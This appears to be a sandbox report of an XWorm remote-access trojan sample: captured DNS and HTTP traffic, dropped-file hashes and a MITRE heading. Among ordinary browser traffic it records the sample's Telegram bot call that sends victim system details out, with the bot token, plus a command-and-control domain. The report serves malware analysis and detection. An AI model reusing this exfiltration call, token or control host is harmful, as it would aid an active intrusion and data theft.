user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
ResponseHTTP/2.0 204
cross-origin-resource-policy: cross-origin
date: Fri, 26 Apr 2024 06:30:56 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Requestrr4---sn-aigl6nsk.googlevideo.comIN AResponserr4---sn-aigl6nsk.googlevideo.comIN CNAMErr4.sn-aigl6nsk.googlevideo.comrr4.sn-aigl6nsk.googlevideo.comIN A74.125.105.105
-
Remote address:8.8.8.8:53Request105.105.125.74.in-addr.arpaIN PTRResponse105.105.125.74.in-addr.arpaIN PTRlhr25s37-in-f91e100net
-
Remote address:8.8.8.8:53Requestwatson.telemetry.microsoft.comIN AResponsewatson.telemetry.microsoft.comIN CNAMEblobcollector.events.data.trafficmanager.netblobcollector.events.data.trafficmanager.netIN CNAMEonedsblobprdeus17.eastus.cloudapp.azure.comonedsblobprdeus17.eastus.cloudapp.azure.comIN A20.42.65.92
-
Remote address:20.42.65.92:443RequestPOST /Telemetry.Request HTTP/1.1
Connection: Keep-Alive
User-Agent: MSDW
MSA_DeviceTicket: t=EwC4AlN5BAAUIUShNzVa+rgHy/M+tY/dQyCg+nEAAfaPerUlf3WdURFVySZwCd/iOsIGp15PfQorNdnT2VjM+1eaEHIdgmIgYymOIQaugHpqmei108Im9OL2zyNzv0yJNQQTPhMAYXCz1gJru2p2s0gHLM7ssR+p6NqP8K0xxlVtadH/QChysBlEUtyS9YfpHIlIvUWekRA0V/dpu7u/1atrrV3qNf1HHCNeDbySG5QW/KZPM6yEhruBB+GdlBnCJLQ5BdWSVHObOu9NXpu3190bOALF+Bf4acvd18zbfH7jc7i0kkTCXnvcPPO05qG0OOWxHl6ZNsp/Jt793ChBXWrlomWT+ETdxYBc1711zhYfopOKdrN8amKhBRIg2xgDZgAACJKd2UjGlakxiAHbwU3cZzddLWUV5qAUWgwVsdnsdVG9uGbnVG7+w5GyZrTgFLg8KqiIvJWQlqerXoViXXqbpAi3aiVgeU2zqcL4FCpu9uxMlVgyg8HqEj2Jx/iOMF9HaQluEYwYf++GW/jcpcJG9mc1FyISmKydVR8hEsfXY3tZ/LcxtHax3ufWJEFnLHwe+v0IlxbgbXwG2/Xy9jML+w19CpALno3ASEo4JADcsGz2YQxqId+d4OtBGju2PFXgH2ZQbgG6q7qCKW4Lz/KUppwUgHww5Qr5FtSElAHu4+6B60oNuEn8t7MMcTdF2NRx4emVrYqW7z+xa5ELT20ZLGA1oY6wImqmtYCaXizwBZQIXZkV8V2pE+637EdOAxdCHFl2JQf72A1oOCwTC+iyCyMzF8iaQGxg5BZd7iBb9VPvaowpeKpYFNZyimOjYInUMVwO2P/JwJeKfxYxp/O3Drf+RV62NrD9Tcu/Q959BpG0OFmZdidmt6OJERPKOHHpZUA7lMG2J90duUPZfqst1LpyVrgB&p=
AAD_TenantId: (null)
Content-Length: 4625
Host: watson.telemetry.microsoft.com
ResponseHTTP/1.1 200 200 OK
Content-Type: text/xml
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
Date: Fri, 26 Apr 2024 06:31:05 GMT
-
Remote address:8.8.8.8:53Request92.65.42.20.in-addr.arpaIN PTRResponse
-
Remote address:172.217.169.14:443RequestGET /watch?v=dQw4w9WgXcQ HTTP/2.0
host: www.youtube.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: GPS=1; VISITOR_INFO1_LIVE=OgPF78F-YOs; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYw%3D%3D; YSC=JkmurakeuKo
ResponseHTTP/2.0 200
x-content-type-options: nosniff
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Fri, 26 Apr 2024 06:31:07 GMT
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=31536000
cross-origin-opener-policy: same-origin-allow-popups; report-to="youtube_main"
report-to: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
origin-trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
content-encoding: br
server: ESF
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:142.250.178.22:443RequestGET /generate_204 HTTP/2.0
host: i.ytimg.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.youtube.com/watch?v=dQw4w9WgXcQ
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
ResponseHTTP/2.0 204
cross-origin-resource-policy: cross-origin
date: Fri, 26 Apr 2024 06:31:07 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Requestwatson.telemetry.microsoft.comIN AResponsewatson.telemetry.microsoft.comIN CNAMEblobcollector.events.data.trafficmanager.netblobcollector.events.data.trafficmanager.netIN CNAMEonedsblobprdeus15.eastus.cloudapp.azure.comonedsblobprdeus15.eastus.cloudapp.azure.comIN A20.42.73.29
-
Remote address:20.42.73.29:443RequestPOST /Telemetry.Request HTTP/1.1
Connection: Keep-Alive
User-Agent: MSDW
MSA_DeviceTicket: t=EwC4AlN5BAAUIUShNzVa+rgHy/M+tY/dQyCg+nEAAfaPerUlf3WdURFVySZwCd/iOsIGp15PfQorNdnT2VjM+1eaEHIdgmIgYymOIQaugHpqmei108Im9OL2zyNzv0yJNQQTPhMAYXCz1gJru2p2s0gHLM7ssR+p6NqP8K0xxlVtadH/QChysBlEUtyS9YfpHIlIvUWekRA0V/dpu7u/1atrrV3qNf1HHCNeDbySG5QW/KZPM6yEhruBB+GdlBnCJLQ5BdWSVHObOu9NXpu3190bOALF+Bf4acvd18zbfH7jc7i0kkTCXnvcPPO05qG0OOWxHl6ZNsp/Jt793ChBXWrlomWT+ETdxYBc1711zhYfopOKdrN8amKhBRIg2xgDZgAACJKd2UjGlakxiAHbwU3cZzddLWUV5qAUWgwVsdnsdVG9uGbnVG7+w5GyZrTgFLg8KqiIvJWQlqerXoViXXqbpAi3aiVgeU2zqcL4FCpu9uxMlVgyg8HqEj2Jx/iOMF9HaQluEYwYf++GW/jcpcJG9mc1FyISmKydVR8hEsfXY3tZ/LcxtHax3ufWJEFnLHwe+v0IlxbgbXwG2/Xy9jML+w19CpALno3ASEo4JADcsGz2YQxqId+d4OtBGju2PFXgH2ZQbgG6q7qCKW4Lz/KUppwUgHww5Qr5FtSElAHu4+6B60oNuEn8t7MMcTdF2NRx4emVrYqW7z+xa5ELT20ZLGA1oY6wImqmtYCaXizwBZQIXZkV8V2pE+637EdOAxdCHFl2JQf72A1oOCwTC+iyCyMzF8iaQGxg5BZd7iBb9VPvaowpeKpYFNZyimOjYInUMVwO2P/JwJeKfxYxp/O3Drf+RV62NrD9Tcu/Q959BpG0OFmZdidmt6OJERPKOHHpZUA7lMG2J90duUPZfqst1LpyVrgB&p=
AAD_TenantId: (null)
Content-Length: 4625
Host: watson.telemetry.microsoft.com
ResponseHTTP/1.1 200 200 OK
Content-Type: text/xml
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
Date: Fri, 26 Apr 2024 06:31:09 GMT
-
Remote address:8.8.8.8:53Request161.19.199.152.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request161.19.199.152.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request200.197.79.204.in-addr.arpaIN PTRResponse200.197.79.204.in-addr.arpaIN PTRa-0001a-msedgenet
-
Remote address:8.8.8.8:53Request200.197.79.204.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request159.113.53.23.in-addr.arpaIN PTRResponse159.113.53.23.in-addr.arpaIN PTRa23-53-113-159deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request159.113.53.23.in-addr.arpaIN PTRResponse159.113.53.23.in-addr.arpaIN PTRa23-53-113-159deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestwww.microsoft.comIN AResponsewww.microsoft.comIN CNAMEwww.microsoft.com-c-3.edgekey.netwww.microsoft.com-c-3.edgekey.netIN CNAMEwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netIN CNAMEe13678.dscb.akamaiedge.nete13678.dscb.akamaiedge.netIN A23.55.97.181
-
Remote address:8.8.8.8:53Requestwww.microsoft.comIN AResponsewww.microsoft.comIN CNAMEwww.microsoft.com-c-3.edgekey.netwww.microsoft.com-c-3.edgekey.netIN CNAMEwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netIN CNAMEe13678.dscb.akamaiedge.nete13678.dscb.akamaiedge.netIN A23.55.97.181
-
Remote address:23.62.61.155:443RequestGET /cortanaassist/rules?cc=US&version=6 HTTP/2.0
host: www.bing.com
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
dnt: 1
ResponseHTTP/2.0 404
content-length: 52707
content-type: text/html; charset=utf-8
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 662b4a611a0845fcbbd6f3ba62fccdfd
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-error-page: 404-custom
x-ua-compatible: IE=edge
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B463D560DAA44A589294627D77EE026A Ref B: BRU30EDGE0612 Ref C: 2024-04-26T06:32:01Z
date: Fri, 26 Apr 2024 06:32:01 GMT
set-cookie: MUID=1773B2984E67671E127FA6F54F0B6610; domain=.bing.com; expires=Wed, 21-May-2025 06:32:01 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=1773B2984E67671E127FA6F54F0B6610; expires=Wed, 21-May-2025 06:32:01 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=11976103112D6AE41CA6756E10416B21&mkt=en-us; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Wed, 21-May-2025 06:32:01 GMT; path=/; HttpOnly
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Sun, 26-Apr-2026 06:32:01 GMT; path=/
set-cookie: SRCHUID=V=2&GUID=4DF9ADBB58434F61B44B6072AFB45246&dmnchg=1; domain=.bing.com; expires=Sun, 26-Apr-2026 06:32:01 GMT; path=/
set-cookie: SRCHUSR=DOB=20240426; domain=.bing.com; expires=Sun, 26-Apr-2026 06:32:01 GMT; path=/
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Sun, 26-Apr-2026 06:32:01 GMT; path=/
set-cookie: _SS=SID=11976103112D6AE41CA6756E10416B21; domain=.bing.com; path=/
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.973d3e17.1714113121.be33666
-
Remote address:8.8.8.8:53Request181.97.55.23.in-addr.arpaIN PTRResponse181.97.55.23.in-addr.arpaIN PTRa23-55-97-181deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request181.97.55.23.in-addr.arpaIN PTRResponse181.97.55.23.in-addr.arpaIN PTRa23-55-97-181deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request155.61.62.23.in-addr.arpaIN PTRResponse155.61.62.23.in-addr.arpaIN PTRa23-62-61-155deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request155.61.62.23.in-addr.arpaIN PTR
-
362 B 562 B 6 5
HTTP Request
GET http://ip-api.com/line/?fields=hostingHTTP Response
200 -
149.154.167.220:443https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y/sendMessage?chat_id=@Xworm234_bot&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A48E03827559D164B317B%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2tls, httpXClient.exe1.4kB 6.7kB 13 12
HTTP Request
GET https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y/sendMessage?chat_id=@Xworm234_bot&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A48E03827559D164B317B%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2HTTP Response
400 -
37.8kB 967.3kB 676 919
-
933.2kB 17.5kB 717 375
-
953 B 4.8kB 8 9
-
142.250.178.4:443https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0tls, http2chrome.exe4.2kB 46.2kB 50 53
HTTP Request
GET https://www.google.com/async/ddljson?async=ntp:2HTTP Request
GET https://www.google.com/async/newtab_promosHTTP Request
GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 -
1.4kB 1.6kB 11 7
-
216.58.201.110:443https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0tls, http2chrome.exe3.6kB 50.0kB 47 46
HTTP Request
GET https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0 -
2.6kB 417 B 10 8
-
236 B 172 B 5 4
-
1.3kB 7.1kB 14 8
-
172.217.169.14:443https://www.youtube.com/s/desktop/5e42dd8a/jsbin/desktop_polymer.vflset/desktop_polymer.jstls, http2MicrosoftEdgeCP.exe136.9kB 3.0MB 2221 2205
HTTP Request
GET https://www.youtube.com/watch?v=dQw4w9WgXcQHTTP Response
200HTTP Request
GET https://www.youtube.com/s/desktop/5e42dd8a/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.jsHTTP Request
GET https://www.youtube.com/s/desktop/5e42dd8a/jsbin/webcomponents-ce-sd.vflset/webcomponents-ce-sd.jsHTTP Request
GET https://www.youtube.com/s/desktop/5e42dd8a/jsbin/intersection-observer.min.vflset/intersection-observer.min.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.youtube.com/s/desktop/5e42dd8a/jsbin/scheduler.vflset/scheduler.jsHTTP Request
GET https://www.youtube.com/s/desktop/5e42dd8a/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.jsHTTP Request
GET https://www.youtube.com/s/player/652ba3a2/www-player.cssHTTP Request
GET https://www.youtube.com/s/desktop/5e42dd8a/cssbin/www-main-desktop-watch-page-skeleton.cssHTTP Request
GET https://www.youtube.com/s/desktop/5e42dd8a/cssbin/www-main-desktop-player-skeleton.cssHTTP Request
GET https://www.youtube.com/s/desktop/5e42dd8a/cssbin/www-onepick.cssHTTP Request
GET https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.FLFMQpi63qc.L.X.O/am=AECAFg/d=0/br=1/rs=AGKMywH7OenIozOPso_R4eAze85u9ntbZgHTTP Request
GET https://www.youtube.com/s/player/652ba3a2/player_ias.vflset/en_US/base.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.youtube.com/s/desktop/5e42dd8a/jsbin/spf.vflset/spf.jsHTTP Request
GET https://www.youtube.com/s/desktop/5e42dd8a/jsbin/network.vflset/network.jsHTTP Request
GET https://www.youtube.com/s/desktop/5e42dd8a/jsbin/desktop_polymer.vflset/desktop_polymer.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200 -
1.6kB 5.5kB 17 11
-
2.0kB 5.7kB 20 12
HTTP Request
GET https://i.ytimg.com/generate_204HTTP Response
204 -
11.1kB 7.5kB 21 18
HTTP Request
POST https://watson.telemetry.microsoft.com/Telemetry.RequestHTTP Response
200 -
1.4kB 7.6kB 16 11
-
172.217.169.14:443https://www.youtube.com/s/desktop/5e42dd8a/jsbin/desktop_polymer.vflset/desktop_polymer.jstls, http2MicrosoftEdgeCP.exe79.3kB 1.9MB 1388 1379
HTTP Request
GET https://www.youtube.com/watch?v=dQw4w9WgXcQHTTP Response
200HTTP Request
GET https://www.youtube.com/s/desktop/5e42dd8a/jsbin/desktop_polymer.vflset/desktop_polymer.jsHTTP Response
200 -
1.0kB 5.5kB 13 11
-
1.4kB 5.7kB 15 12
HTTP Request
GET https://i.ytimg.com/generate_204HTTP Response
204 -
594 B 5.4kB 8 6
-
594 B 5.4kB 8 6
-
7.2kB 7.5kB 16 13
HTTP Request
POST https://watson.telemetry.microsoft.com/Telemetry.RequestHTTP Response
200 -
10.1kB 221.2kB 184 181
HTTP Request
GET https://www.youtube.com/watch?v=dQw4w9WgXcQHTTP Response
200 -
1.4kB 7.7kB 17 12
-
1.2kB 5.5kB 14 11
-
1.9kB 5.6kB 16 10
HTTP Request
GET https://i.ytimg.com/generate_204HTTP Response
204 -
476 B 156 B 5 3
-
476 B 156 B 5 3
-
7.0kB 6.1kB 15 11
HTTP Request
POST https://watson.telemetry.microsoft.com/Telemetry.RequestHTTP Response
200 -
14.3kB 1.4kB 34 31
-
1.2kB 8.1kB 15 13
-
326 B 191 B 5 4
-
1.2kB 4.8kB 17 12
-
23.62.61.155:443https://www.bing.com/cortanaassist/rules?cc=US&version=6tls, http2MicrosoftEdge.exe3.5kB 60.9kB 62 55
HTTP Request
GET https://www.bing.com/cortanaassist/rules?cc=US&version=6HTTP Response
404 -
1.0kB 290 B 8 6
-
277.4kB 5.1kB 206 117
-
1.4kB 266 B 7 5
-
754 B 290 B 7 6
-
509 B 341 B 8 6
-
46 B 1
-
1.5kB 266 B 9 5
-
548.9kB 11.6kB 423 231
-
19.9kB 577 B 22 10
-
56 B 72 B 1 1
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
71 B 95 B 1 1
DNS Request
1.112.95.208.in-addr.arpa
-
62 B 78 B 1 1
DNS Request
api.telegram.org
DNS Response
149.154.167.220
-
148 B 167 B 2 1
DNS Request
220.167.154.149.in-addr.arpa
DNS Request
220.167.154.149.in-addr.arpa
-
156 B 94 B 2 1
DNS Request
phentermine-partial.gl.at.ply.gg
DNS Request
phentermine-partial.gl.at.ply.gg
DNS Response
147.185.221.19
-
219 B 130 B 3 1
DNS Request
19.221.185.147.in-addr.arpa
DNS Request
19.221.185.147.in-addr.arpa
DNS Request
19.221.185.147.in-addr.arpa
-
144 B 158 B 2 1
DNS Request
28.173.189.20.in-addr.arpa
DNS Request
28.173.189.20.in-addr.arpa
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
142.250.178.4
-
3.4kB 7.2kB 12 8
-
144 B 169 B 2 1
DNS Request
67.204.58.216.in-addr.arpa
DNS Request
67.204.58.216.in-addr.arpa
-
72 B 110 B 1 1
DNS Request
4.178.250.142.in-addr.arpa
-
61 B 98 B 1 1
DNS Request
apis.google.com
DNS Response
216.58.201.110
-
73 B 173 B 1 1
DNS Request
110.201.58.216.in-addr.arpa
-
204 B 3
-
71 B 135 B 1 1
DNS Request
249.197.17.2.in-addr.arpa
-
4.0kB 8.3kB 14 14
-
61 B 335 B 1 1
DNS Request
www.youtube.com
DNS Response
172.217.169.14216.58.212.206172.217.169.78172.217.169.46142.250.179.238142.250.180.14142.250.187.206142.250.187.238142.250.178.14172.217.16.238142.250.200.14142.250.200.46216.58.201.110216.58.204.78216.58.213.14
-
73 B 112 B 1 1
DNS Request
14.169.217.172.in-addr.arpa
-
74 B 112 B 1 1
DNS Request
195.187.250.142.in-addr.arpa
-
57 B 233 B 1 1
DNS Request
i.ytimg.com
DNS Response
142.250.178.22172.217.16.246142.250.200.22142.250.200.54216.58.201.118216.58.204.86172.217.169.54142.250.179.246142.250.180.22142.250.187.214142.250.187.246
-
73 B 112 B 1 1
DNS Request
22.178.250.142.in-addr.arpa
-
73 B 142 B 1 1
DNS Request
234.16.217.172.in-addr.arpa
-
219 B 171 B 3 1
DNS Request
227.212.58.216.in-addr.arpa
DNS Request
227.212.58.216.in-addr.arpa
DNS Request
227.212.58.216.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
50.251.17.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
22.160.190.20.in-addr.arpa
-
76 B 204 B 1 1
DNS Request
watson.telemetry.microsoft.com
DNS Response
20.42.73.29
-
70 B 156 B 1 1
DNS Request
29.73.42.20.in-addr.arpa
-
61 B 98 B 1 1
DNS Request
apis.google.com
DNS Response
216.58.201.110
-
2.5kB 3.6kB 10 10
-
79 B 125 B 1 1
DNS Request
rr4---sn-aigl6nsk.googlevideo.com
DNS Response
74.125.105.105
-
73 B 111 B 1 1
DNS Request
105.105.125.74.in-addr.arpa
-
76 B 204 B 1 1
DNS Request
watson.telemetry.microsoft.com
DNS Response
20.42.65.92
-
70 B 156 B 1 1
DNS Request
92.65.42.20.in-addr.arpa
-
76 B 204 B 1 1
DNS Request
watson.telemetry.microsoft.com
DNS Response
20.42.73.29
-
146 B 144 B 2 1
DNS Request
161.19.199.152.in-addr.arpa
DNS Request
161.19.199.152.in-addr.arpa
-
146 B 106 B 2 1
DNS Request
200.197.79.204.in-addr.arpa
DNS Request
200.197.79.204.in-addr.arpa
-
144 B 274 B 2 2
DNS Request
159.113.53.23.in-addr.arpa
DNS Request
159.113.53.23.in-addr.arpa
-
126 B 460 B 2 2
DNS Request
www.microsoft.com
DNS Request
www.microsoft.com
DNS Response
23.55.97.181
DNS Response
23.55.97.181
-
142 B 270 B 2 2
DNS Request
181.97.55.23.in-addr.arpa
DNS Request
181.97.55.23.in-addr.arpa
-
142 B 135 B 2 1
DNS Request
155.61.62.23.in-addr.arpa
DNS Request
155.61.62.23.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5bdf0cbd5e46604a3a7d9901232ae2b0c
SHA15b1e596f37a394576550341775ee485bf6bacd4d
SHA256ade2d033b7570952432b872dd5fbdd4e899a79a726392216e9b62a5a7903da8c
SHA51221956d1af9ed31c04f1b14d346df50f1ca6a38e9c8cb5cef21df5a13267e9caf4c2a418c938b8b15a0e0844ff00d0a283f94fa1c3a739160ab27855918799bfc
-
Filesize
987B
MD5a7374729fb526bfa283310c079b1b410
SHA1ca7a0fadcefa1d1382843bec76f299bc4a5673a0
SHA256e2e23104e43839d9c8001321372741138a12fab02c0eb4d7e9c1bfeb0375c3c7
SHA512212346cf372a34cdbf3dd2854d99fc4971828b056d79fcdaa814c26d67a21ef128ec616dee153d97f5b85d4f6e001b129caa2ada29daa7a7fd2c6d755c037878
-
Filesize
1KB
MD512feb035826722ce6dfabec6c49704fe
SHA12f957666d7a5d55afca8144c9835abb62c74cf34
SHA256ce70aee21176f900fbb5549c98d777ad52fb011484495afc4274986205cf87c0
SHA51211942494de8afdab5c9403f74c008c151ff4439170fbfe3d0f078a2ef095e017c5efe42cfccd9a1a1bd4256558b34e7edb442d4dfdbbe778b024c71627486f2b
-
Filesize
987B
MD575ab4bfb0b789095cd18e3e2b05ca60a
SHA1764f52ba48ebe11149517bcbcda6ffcf538af274
SHA2564e9bae0ba9f47cba73b627c1ba5f8599318c923f599d8bdafb40985162194346
SHA51239d3a7b9576cd5ee7a143417357c52ebb660216d68889f717344e027f1b018938565875b5b0934c00eec06cf13874a4fc2111fe13d56afcc20d5db829a7bc561
-
Filesize
1KB
MD5a5b1951ff4848c60c762599c2f843407
SHA164817cac2fb80354dec395187f2bbbba8fce7ff9
SHA256dfc046f9a13638297466564408065b0adc3c2ceeb518bbc8c0e27baf17bb1ddd
SHA512e44db1ed7d07f4f56b63d49a6728b14b8a47d1ce411658fae01485caeb2ec5b9573e391fbb85e427b9af614ea895ffa0016c271e41c6b99d904886cb90de2ebb
-
Filesize
371B
MD5e86c7f3c4082989ec1acc11df80458d4
SHA1da3db276a32224da35b68002577e75d316cdd779
SHA2560ec53f1228ac405d5d0c008672e72f35e3f998b71d168364baeb3c1fb2c4a9d1
SHA512337585b79e2bc684cfe1dc54bc57b9483da790ccb6ddbcc5d9e9ecd35bf0f11f2d2506bb8cd1958d6e9b2bea88f88a9493953d91426ab734817aa1e96e2884d8
-
Filesize
5KB
MD52af61aaeb4febdbef762005069bbb239
SHA18bf7bec95be9c22a49227020d10e5daab9062c60
SHA256b86d427a9587d5fc8593f9c921668d9c13fdc21856ebf211e816f3fd511453bd
SHA512ab99c67ba8288531256a13f20d9f2c0575b807b63e342cb9cca6952ddecba82e327b20f847b4a3ed533b2162554ec6e4c7af93471af6aba4df80e56d1b2f7f58
-
Filesize
5KB
MD51ad2bb090dd88d0c6a5da720cce41847
SHA1b8b09729c7bf7cce3d15c34504501cef4f01f2ad
SHA25645195ebb8af681ae1b970e6737b6f404fb136106aeb2b1ec59c50ebd12f4cc3a
SHA512edc835de5accf70689a2aa8b25d465ba5188ac2c3daf399d72f87679b1aaf78ea6d0d6cb74eb265029ab1e8bbc3db74c0b7fee3987ba07c404a479df64918437
-
Filesize
5KB
MD5faf6084f998b1b827a9eb8381638c1fe
SHA125469ab376ef25f2026f39fb435bcaf09248a1dc
SHA256159cf0f2d9b16c39a4421e4d3e900fd21b1df26744c1fd7eb92719b37a9d56bb
SHA512bdbb61f4c737747edbde9fb0662f17d32dd83a238356ea7b6e1dd907c8080b081154758ceaa1bc7b73dc494edad9e05ebd78a5fe90db8182356d4dc39a59df5e
-
Filesize
272KB
MD5c8d51180996482a213d274ac39c076ed
SHA1bd7588eb78034bc50f00bb96c54261f19f280af5
SHA256539f5ae2d8bea81e6313e76680837d5075ecb7ed4b57eb4ff865f21c7204c8fe
SHA51259f28a75d24a1e951f356ed918f62520798ab26164020b91cfee3958660ec6c3516376d7032c9953341eeff7cdd86ff795fa7495cca39bb4389d99c8bc5a8d45
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
654B
MD516c5fce5f7230eea11598ec11ed42862
SHA175392d4824706090f5e8907eee1059349c927600
SHA25687ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
